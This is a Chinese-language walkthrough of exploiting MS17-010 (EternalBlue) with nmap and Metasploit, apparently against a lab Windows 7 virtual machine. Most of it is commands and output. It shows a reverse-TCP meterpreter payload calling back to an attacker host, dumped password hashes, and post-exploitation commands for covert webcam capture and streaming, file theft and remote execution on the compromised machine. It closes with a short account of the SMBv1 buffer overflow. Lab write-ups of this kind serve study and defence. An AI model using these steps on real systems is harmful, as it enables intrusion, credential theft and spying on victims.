Kali nmap工具利用渗透测试

MS17-010（永恒之蓝）漏洞复现

#收集同网段主机信息
nmap 192.168.80.0/24 -sS -sV  

Nmap scan report for 192.168.80.128
Host is up (0.00020s latency).
Not shown: 984 closed ports
PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
80/tcp    open  http               Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
554/tcp   open  rtsp?
2869/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3306/tcp  open  mysql              MySQL (unauthorized)
3389/tcp  open  ssl/ms-wbt-server?
5357/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10243/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
MAC Address: 00:0C:29:81:14:B7 (VMware)
Service Info: Host: CLIENT-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (5 hosts up) scanned in 152.09 seconds

#可以看到445端口开启，尝试使用ms17-010进行渗透测试。
msfconsole
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.80.128
run

#主机是Windows7，存在永恒之蓝漏洞，使用攻击模块进行攻击
[+] 192.168.80.128:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.80.128:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

use exploit/windows/smb/ms17_010_eternalblue
set set rhosts 192.168.80.128
set payload windows/x64/meterpreter/reverse_tcp
run

[*] Started reverse TCP handler on 192.168.80.131:4444 
[*] 192.168.80.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.80.128:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.80.128:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.80.128:445 - The target is vulnerable.
[*] 192.168.80.128:445 - Connecting to target for exploitation.
[+] 192.168.80.128:445 - Connection established for exploitation.
[+] 192.168.80.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.80.128:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.80.128:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.80.128:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.80.128:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.80.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.80.128:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.80.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.80.128:445 - Starting non-paged pool grooming
[+] 192.168.80.128:445 - Sending SMBv2 buffers
[+] 192.168.80.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.80.128:445 - Sending final SMBv2 buffers.
[*] 192.168.80.128:445 - Sending last fragment of exploit packet!
[*] 192.168.80.128:445 - Receiving response from exploit packet
[+] 192.168.80.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.80.128:445 - Sending egg to corrupted connection.
[*] 192.168.80.128:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.80.128
[*] Meterpreter session 1 opened (192.168.80.131:4444 -> 192.168.80.128:57413) at 2023-06-18 10:40:09 -0400
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >

#攻击成功
screenshot #截屏
getuid #获知系统权限
hashdump #获取系统md5加密密码（如“aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::”=“12345678”）
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1003:aad3b435b51404eeaad3b435b51404ee:b00ed0d8b185f96414dab094a2314a7e:::

webcam_list #查看摄像头
webcam_snap #摄像头拍照
webcam_stream #摄像头即时观看
upload #上传文件
download #下载文件
edit #编辑文件
search #搜索文件
execute #执行文件
shutdown #关闭肉鸡

漏洞原理：

漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时，在大非分页池(内核的数据结构，Large Non-Paged Kernel Pool)上存在缓冲区溢出。函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小。然后会进行如下操作：

1.srv!SrvOs2FeaListSizeToNt会计算FEA list的大小并更新待转换的FEA list的大小

2.因为错误的使用WORD强制类型转换，导致计算出来的待转换的FEA list的大小比真正的FEA list大

因为原先的总大小计算错误，导致当FEA list被转化为NTFEA list时，会在非分页池导致缓冲区溢出。